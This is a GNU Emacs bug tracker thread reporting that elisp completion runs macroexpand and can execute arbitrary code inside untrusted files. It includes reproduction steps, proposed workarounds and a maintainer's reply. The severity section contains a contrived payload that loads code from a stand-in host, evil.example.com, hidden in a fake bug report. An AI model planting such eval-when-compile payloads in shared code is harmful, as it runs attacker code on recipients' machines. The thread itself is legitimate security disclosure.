X-Loop: help-debbugs@HIDDEN
Subject: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
Resent-From: Wilfred Hughes <me@HIDDEN>
Original-Sender: "Debbugs-submit" <debbugs-submit-bounces <at> debbugs.gnu.org>
Resent-CC: bug-gnu-emacs@HIDDEN
Resent-Date: Wed, 22 Aug 2018 00:13:02 +0000
Resent-Message-ID: <handler.32495.B.153489675311777 <at> debbugs.gnu.org>
Resent-Sender: help-debbugs@HIDDEN
X-GNU-PR-Message: report 32495
X-GNU-PR-Package: emacs
X-GNU-PR-Keywords:
To: 32495 <at> debbugs.gnu.org
X-Debbugs-Original-To: bug-gnu-emacs@HIDDEN
Received: via spool by submit <at> debbugs.gnu.org id=B.153489675311777
(code B ref -1); Wed, 22 Aug 2018 00:13:02 +0000
Received: (at submit) by debbugs.gnu.org; 22 Aug 2018 00:12:33 +0000
Received: from localhost ([127.0.0.1]:57143 helo=debbugs.gnu.org)
by debbugs.gnu.org with esmtp (Exim 4.84_2)
(envelope-from <debbugs-submit-bounces <at> debbugs.gnu.org>)
id 1fsGlE-00033s-MQ
for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:32 -0400
Received: from eggs.gnu.org ([208.118.235.92]:34000)
by debbugs.gnu.org with esmtp (Exim 4.84_2)
(envelope-from <me@HIDDEN>) id 1fsGlD-00033h-Sc
for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:32 -0400
Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
(envelope-from <me@HIDDEN>) id 1fsGl6-0001ax-Oj
for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:26 -0400
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org
X-Spam-Level:
X-Spam-Status: No, score=0.8 required=5.0 tests=BAYES_50,T_DKIM_INVALID
autolearn=disabled version=3.3.2
Received: from lists.gnu.org ([2001:4830:134:3::11]:39583)
by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_256_CBC_SHA1:32)
(Exim 4.71) (envelope-from <me@HIDDEN>) id 1fsGl4-0001aU-UE
for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 20:12:24 -0400
Received: from eggs.gnu.org ([2001:4830:134:3::10]:54981)
by lists.gnu.org with esmtp (Exim 4.71)
(envelope-from <me@HIDDEN>) id 1fsGl3-00026V-V4
for bug-gnu-emacs@HIDDEN; Tue, 21 Aug 2018 20:12:22 -0400
Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
(envelope-from <me@HIDDEN>) id 1fsGkz-0001WR-Q5
for bug-gnu-emacs@HIDDEN; Tue, 21 Aug 2018 20:12:21 -0400
Received: from mail-qk0-x233.google.com ([2607:f8b0:400d:c09::233]:39620)
by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_128_CBC_SHA1:16)
(Exim 4.71) (envelope-from <me@HIDDEN>) id 1fsGkz-0001Vh-Af
for bug-gnu-emacs@HIDDEN; Tue, 21 Aug 2018 20:12:17 -0400
Received: by mail-qk0-x233.google.com with SMTP id b19-v6so115621qkc.6
for <bug-gnu-emacs@HIDDEN>; Tue, 21 Aug 2018 17:12:16 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=wilfred-me-uk.20150623.gappssmtp.com; s=20150623;
h=mime-version:from:date:message-id:subject:to;
bh=wNhca8jq89xU+bpdWGm6jYsd1Q5bz9s7PMf7+sj6eHk=;
b=svqvWuwphtIuSCfx9/r2uxLFzHXkIttUlpcOuW0nyQlTXUXgaobKzKZfkgKudvc7oV
P2W8IVh7cXWtEJsLdkKfvzx6MSTbjWg3W8YgKbxRQn/voFjcLR7uDwgJtoj9sAmtmt6A
W5u6NEWvPpeTDq55n+93wgApzjsH9T+VW0EuXpHrLucwzw76IXd0aI+DEt05bohX4F2J
7/Vrlvse7cuwVuW5FNRHNl1a+BEoV0XvCbIxW8uZGA5zM9DVDIc1g4ZEGpIcjXkjXWz0
/cPTgqT5RODSTfLZYUh/4FQsKklBL0PdMIHinAzIArnOCbtRr/nIdToPfVWmnXR2H1Oz
mY0Q==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=1e100.net; s=20161025;
h=x-gm-message-state:mime-version:from:date:message-id:subject:to;
bh=wNhca8jq89xU+bpdWGm6jYsd1Q5bz9s7PMf7+sj6eHk=;
b=awQkDBnnkF1i0IbC7gMqcpqZ7dGCZB3Qt1/28UHrXs3h/nxmMsQHDb41bFTgCXDEgQ
I1K+EdinWpJTqavwZ3IIzNgYQEPOXqueOkyI92sLxXSq7FmFfMOaW4259v5tfkxPt6WQ
BEWLJFTqbOuoLXq4UPfS/+7gUnZS++bX9wWUbratUVgI3pIWqepyhCIzAnBnEr3EfZdo
eBUmHHEk5HZz9qX2qAfk0Z+/PytnnyGDqOj1es7Bk1VcoBtI8v/+H5T81KNcD4252OpV
pSuUsi8ifns2Okzbx7xoYg6pOYa6j3QZ/iJnBvszRAAUttzbWFRtnetZ6eW511S5HjFl
c1NA==
X-Gm-Message-State: AOUpUlHPeAqbCf9lGWAhOgQmkzOJzpFZG6A4MxxSQz+urLQqKHusQij2
Oe4TtsRlQgNgA1VapdYrh2wt4a5QFszZtEHIkyMchN0wIa0=
X-Google-Smtp-Source: AA+uWPwsBbdQuusbmfMdRCFJFbB/+dMneRYGG/E9yTyYeYnI+yxh+eqT0kQwkVnVJKjPZysbYlEKIFlhx2N/d3yRXVY=
X-Received: by 2002:a37:76c6:: with SMTP id
r189-v6mr46370064qkc.282.1534896735980;
Tue, 21 Aug 2018 17:12:15 -0700 (PDT)
MIME-Version: 1.0
Received: by 2002:aed:3305:0:0:0:0:0 with HTTP; Tue, 21 Aug 2018 17:11:55
-0700 (PDT)
X-Originating-IP: [92.233.94.77]
From: Wilfred Hughes <me@HIDDEN>
Date: Wed, 22 Aug 2018 01:11:55 +0100
Message-ID: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN>
Content-Type: text/plain; charset="UTF-8"
X-detected-operating-system: by eggs.gnu.org: Genre and OS details not
recognized.
X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x
X-Received-From: 2001:4830:134:3::11
X-Spam-Score: -4.0 (----)
X-BeenThere: debbugs-submit <at> debbugs.gnu.org
X-Mailman-Version: 2.1.18
Precedence: list
List-Id: <debbugs-submit.debbugs.gnu.org>
List-Unsubscribe: <https://debbugs.gnu.org/cgi-bin/mailman/options/debbugs-submit>,
<mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=unsubscribe>
List-Archive: <https://debbugs.gnu.org/cgi-bin/mailman/private/debbugs-submit/>
List-Post: <mailto:debbugs-submit <at> debbugs.gnu.org>
List-Help: <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=help>
List-Subscribe: <https://debbugs.gnu.org/cgi-bin/mailman/listinfo/debbugs-submit>,
<mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=subscribe>
Errors-To: debbugs-submit-bounces <at> debbugs.gnu.org
Sender: "Debbugs-submit" <debbugs-submit-bounces <at> debbugs.gnu.org>
X-Spam-Score: -5.0 (-----)
elisp-completion-at-point calls macroexpand, which may execute arbitrary code.
REPRODUCING
1. Insert this code in a buffer in emacs-lisp-mode.
(let ((foo (eval-when-compile (debug))))
x)
2. Put point on x.
3. Press C-M-i, or M-x elisp-completion-at-point.
4. Observe that the debugger is opened, because code is being executed!
SEVERITY
I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not. A contrived example might look
like a bug report containing the following:
(let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
;; ... lots of code
(bar 1))
;; Dear maintainer, I've found a bug in your completion. Please try
;; completion in the following:
abc
)
This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks. However,
this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.
WORKAROUNDS
When calling macroexpand or macroexpand-all, either:
1. pass in an environment with all untrusted macros replaced with dummies:
(let ((macro-whitelist '(when pcase))
all-macros
safe-env)
(mapatoms
(lambda (sym)
(when (macrop sym)
(push sym all-macros))))
(mapc
(lambda (sym)
(unless (memq sym macro-whitelist)
(push (cons sym (symbol-function 'ignore))
safe-env)))
all-macros)
(macroexpand-all
arbitrary-form-here
safe-env))
2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):
(cl-letf (((symbol-function 'eval) #'ignore)
((symbol-function 'eval-region) #'ignore)
((symbol-function 'eval-buffer) #'ignore)
((symbol-function 'backtrace-eval) #'ignore))
(macroexpand-all some-arbitrary-form-here))
Content-Disposition: inline Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 X-Mailer: MIME-tools 5.505 (Entity 5.505) Content-Type: text/plain; charset=utf-8 X-Loop: help-debbugs@HIDDEN From: help-debbugs@HIDDEN (GNU bug Tracking System) To: Wilfred Hughes <me@HIDDEN> Subject: bug#32495: Acknowledgement (26.1; Arbitrary code execution when completing inside untrusted elisp code) Message-ID: <handler.32495.B.153489675311777.ack <at> debbugs.gnu.org> References: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN> X-Gnu-PR-Message: ack 32495 X-Gnu-PR-Package: emacs Reply-To: 32495 <at> debbugs.gnu.org Date: Wed, 22 Aug 2018 00:13:02 +0000 Thank you for filing a new bug report with debbugs.gnu.org. This is an automatically generated reply to let you know your message has been received. Your message is being forwarded to the package maintainers and other interested parties for their attention; they will reply in due course. Your message has been sent to the package maintainer(s): bug-gnu-emacs@HIDDEN If you wish to submit further information on this problem, please send it to 32495 <at> debbugs.gnu.org. Please do not send mail to help-debbugs@HIDDEN unless you wish to report a problem with the Bug-tracking system. --=20 32495: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=3D32495 GNU Bug Tracking System Contact help-debbugs@HIDDEN with problems
Received: (at control) by debbugs.gnu.org; 22 Aug 2018 02:07:53 +0000 From debbugs-submit-bounces <at> debbugs.gnu.org Tue Aug 21 22:07:53 2018 Received: from localhost ([127.0.0.1]:57165 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from <debbugs-submit-bounces <at> debbugs.gnu.org>) id 1fsIYr-0005yx-5J for submit <at> debbugs.gnu.org; Tue, 21 Aug 2018 22:07:53 -0400 Received: from eggs.gnu.org ([208.118.235.92]:52216) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from <rgm@HIDDEN>) id 1fsIYm-0005ya-U6 for control <at> debbugs.gnu.org; Tue, 21 Aug 2018 22:07:49 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from <rgm@HIDDEN>) id 1fsIYg-00032T-6C for control <at> debbugs.gnu.org; Tue, 21 Aug 2018 22:07:43 -0400 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=disabled version=3.3.2 Received: from fencepost.gnu.org ([2001:4830:134:3::e]:49598) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from <rgm@HIDDEN>) id 1fsIYg-00032I-1B for control <at> debbugs.gnu.org; Tue, 21 Aug 2018 22:07:42 -0400 Received: from rgm by fencepost.gnu.org with local (Exim 4.82) (envelope-from <rgm@HIDDEN>) id 1fsIYf-0003QH-UG for control <at> debbugs.gnu.org; Tue, 21 Aug 2018 22:07:41 -0400 Subject: control message for bug 32495 To: <control <at> debbugs.gnu.org> X-Mailer: mail (GNU Mailutils 2.99.98) Message-Id: <E1fsIYf-0003QH-UG@HIDDEN> From: Glenn Morris <rgm@HIDDEN> Date: Tue, 21 Aug 2018 22:07:41 -0400 X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic] X-Received-From: 2001:4830:134:3::e X-Spam-Score: -5.0 (-----) X-Debbugs-Envelope-To: control X-BeenThere: debbugs-submit <at> debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: <debbugs-submit.debbugs.gnu.org> List-Unsubscribe: <https://debbugs.gnu.org/cgi-bin/mailman/options/debbugs-submit>, <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=unsubscribe> List-Archive: <https://debbugs.gnu.org/cgi-bin/mailman/private/debbugs-submit/> List-Post: <mailto:debbugs-submit <at> debbugs.gnu.org> List-Help: <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=help> List-Subscribe: <https://debbugs.gnu.org/cgi-bin/mailman/listinfo/debbugs-submit>, <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=subscribe> Errors-To: debbugs-submit-bounces <at> debbugs.gnu.org Sender: "Debbugs-submit" <debbugs-submit-bounces <at> debbugs.gnu.org> X-Spam-Score: -6.0 (------) tag 32495 security
X-Loop: help-debbugs@HIDDEN
Subject: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
Resent-From: Stefan Monnier <monnier@HIDDEN>
Original-Sender: "Debbugs-submit" <debbugs-submit-bounces <at> debbugs.gnu.org>
Resent-CC: bug-gnu-emacs@HIDDEN
Resent-Date: Thu, 23 Aug 2018 18:55:01 +0000
Resent-Message-ID: <handler.32495.B32495.153505048115319 <at> debbugs.gnu.org>
Resent-Sender: help-debbugs@HIDDEN
X-GNU-PR-Message: followup 32495
X-GNU-PR-Package: emacs
X-GNU-PR-Keywords: security
To: Wilfred Hughes <me@HIDDEN>
Cc: 32495 <at> debbugs.gnu.org
Received: via spool by 32495-submit <at> debbugs.gnu.org id=B32495.153505048115319
(code B ref 32495); Thu, 23 Aug 2018 18:55:01 +0000
Received: (at 32495) by debbugs.gnu.org; 23 Aug 2018 18:54:41 +0000
Received: from localhost ([127.0.0.1]:59090 helo=debbugs.gnu.org)
by debbugs.gnu.org with esmtp (Exim 4.84_2)
(envelope-from <debbugs-submit-bounces <at> debbugs.gnu.org>)
id 1fsukj-0003z1-AX
for submit <at> debbugs.gnu.org; Thu, 23 Aug 2018 14:54:41 -0400
Received: from pmta11.teksavvy.com ([76.10.157.34]:42471)
by debbugs.gnu.org with esmtp (Exim 4.84_2)
(envelope-from <monnier@HIDDEN>) id 1fsukg-0003yk-6e
for 32495 <at> debbugs.gnu.org; Thu, 23 Aug 2018 14:54:39 -0400
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: A2FSCwBbAn9b/+N53mhcHAEBAQQBAQoBAYNPgWSIQ4RBiz4BggwTIAGXZwuEZgQCAoMOIjgUAQIBAQEBAQECAgJpKIU5AQQBViMFCwsOJhIUGA0khS8IpGCKYIk3ggCDdi6KVgKSUohKCZAEiDOGDZM/gVgigVIzGggwgyWCTI4iI45wAQE
X-IPAS-Result: A2FSCwBbAn9b/+N53mhcHAEBAQQBAQoBAYNPgWSIQ4RBiz4BggwTIAGXZwuEZgQCAoMOIjgUAQIBAQEBAQECAgJpKIU5AQQBViMFCwsOJhIUGA0khS8IpGCKYIk3ggCDdi6KVgKSUohKCZAEiDOGDZM/gVgigVIzGggwgyWCTI4iI45wAQE
X-IronPort-AV: E=Sophos;i="5.53,279,1531800000"; d="scan'208";a="44991267"
Received: from 104-222-121-227.cpe.teksavvy.com (HELO fmsmemgm.homelinux.net)
([104.222.121.227])
by smtp.teksavvy.com with ESMTP/TLS/DHE-RSA-AES256-GCM-SHA384;
23 Aug 2018 14:54:31 -0400
Received: by fmsmemgm.homelinux.net (Postfix, from userid 20848)
id 76740AE120; Thu, 23 Aug 2018 14:54:31 -0400 (EDT)
From: Stefan Monnier <monnier@HIDDEN>
Message-ID: <jwvefeoudlu.fsf-monnier+emacs@HIDDEN>
References: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN>
Date: Thu, 23 Aug 2018 14:54:31 -0400
In-Reply-To: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN>
(Wilfred Hughes's message of "Wed, 22 Aug 2018 01:11:55 +0100")
User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.0.50 (gnu/linux)
MIME-Version: 1.0
Content-Type: text/plain
X-Spam-Score: 0.3 (/)
X-BeenThere: debbugs-submit <at> debbugs.gnu.org
X-Mailman-Version: 2.1.18
Precedence: list
List-Id: <debbugs-submit.debbugs.gnu.org>
List-Unsubscribe: <https://debbugs.gnu.org/cgi-bin/mailman/options/debbugs-submit>,
<mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=unsubscribe>
List-Archive: <https://debbugs.gnu.org/cgi-bin/mailman/private/debbugs-submit/>
List-Post: <mailto:debbugs-submit <at> debbugs.gnu.org>
List-Help: <mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=help>
List-Subscribe: <https://debbugs.gnu.org/cgi-bin/mailman/listinfo/debbugs-submit>,
<mailto:debbugs-submit-request <at> debbugs.gnu.org?subject=subscribe>
Errors-To: debbugs-submit-bounces <at> debbugs.gnu.org
Sender: "Debbugs-submit" <debbugs-submit-bounces <at> debbugs.gnu.org>
X-Spam-Score: -0.7 (/)
> 1. pass in an environment with all untrusted macros replaced with dummies:
Sounds like a good first step.
We could even start with a blacklist rather than a whitelist
(eval-when-compile, eval-and-compile, cl-eval-when, ...), so the point
would be to protect oneself from accidental problems rather than from
malign adversaries.
> 2. bind all eval-capable functions first (INCOMPLETE, there are other
> eval-capable functions, such as load):
Trying to plug each and every hole sounds like a losing game
(e.g. you can implement `eval` by building a `(lambda () ,exp) and then
causing it to be called one way or another).
Ideally, we'd have some way to confine Elisp code to a sandbox of some
sort (e.g. no access to any I/O and all changes to global vars are ignored).
Stefan
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997 nCipher Corporation Ltd,
1994-97 Ian Jackson.